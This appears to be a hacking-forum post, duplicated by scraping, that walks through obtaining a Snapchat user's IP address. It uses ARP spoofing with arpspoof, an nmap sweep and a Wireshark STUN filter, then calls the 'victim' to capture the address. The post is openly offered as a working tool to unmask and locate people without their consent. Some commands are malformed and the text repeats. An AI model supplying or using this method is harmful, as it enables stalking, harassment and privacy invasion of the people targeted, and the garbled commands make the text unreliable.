stevieb17121
Keylogger Expert
2
MONTHS
2 2 MONTHS OF SERVICE
LEVEL 1
400 XP
Here is some things you will need in order to make this work:
Requirements: - Mac OS X / Kali linux ( or any UNIX )
- A phone where you have snapchat on ( Im assuming its a phone )
- Nmap
- Some tools and little MITM knowledge !
Here's how it's done:
Download Wireshark -> https://www.wireshark.org/
Download arpspoof for Mac ->
1. Fire up terminal and ip forward your laptop/pc with this scripts:
On Kali:
Code:
On Mac:
Code:
2. Find your phone device local ip and write it down.
Code:
Example:
Code:
3. Spoof your phone.
Code:
Example:
Code:
[/code]
Sometimes you need to reverse arpspoof aswell so to be safe, switch gateway with phone ip:
Code:
[/code]
4. Fire up Wireshark and filter on your phone ip with STUN protocol
Code:
Example:
Code:
[/code]
5. Call your victim on snap and keep calling him for around 5 seconds.
Wireshark should throw up some binding requests, then some other STUN ones.
Those last ones are your victim's ip.
Requirements: - Mac OS X / Kali linux ( or any UNIX )
- A phone where you have snapchat on ( Im assuming its a phone )
- Nmap
- Some tools and little MITM knowledge !
Here's how it's done:
Download Wireshark -> https://www.wireshark.org/
Download arpspoof for Mac ->
You must upgrade your account or reply in the thread to view hidden text.
On Kali:
Code:
Code:
sudo sysctl net.ipv4.ip_forward = 1
sudo net.ipv4.ip_forward = 1
Code:
Code:
sudo sysctl -w net.inet.ip.forwarding=1
Code:
Code:
nmap -sn (or -sP) <gateway ip>/24
Code:
Code:
nmap -sn 192.168.0.1/24
Code:
Code:
arpspoof -i -t gateway
Code:
Code:
[code]
arpspoof -i en0 -t 192.168.0.160 192.168.0.1
Sometimes you need to reverse arpspoof aswell so to be safe, switch gateway with phone ip:
Code:
Code:
[code]
arpspoof -i en0 -t 192.168.0.1 192.168.0.160
4. Fire up Wireshark and filter on your phone ip with STUN protocol
Code:
Code:
ip.addr == <phone ip> && stun
Code:
Code:
[code]
ip.addr == 192.168.0.160 && stun
5. Call your victim on snap and keep calling him for around 5 seconds.
Wireshark should throw up some binding requests, then some other STUN ones.
Those last ones are your victim's ip.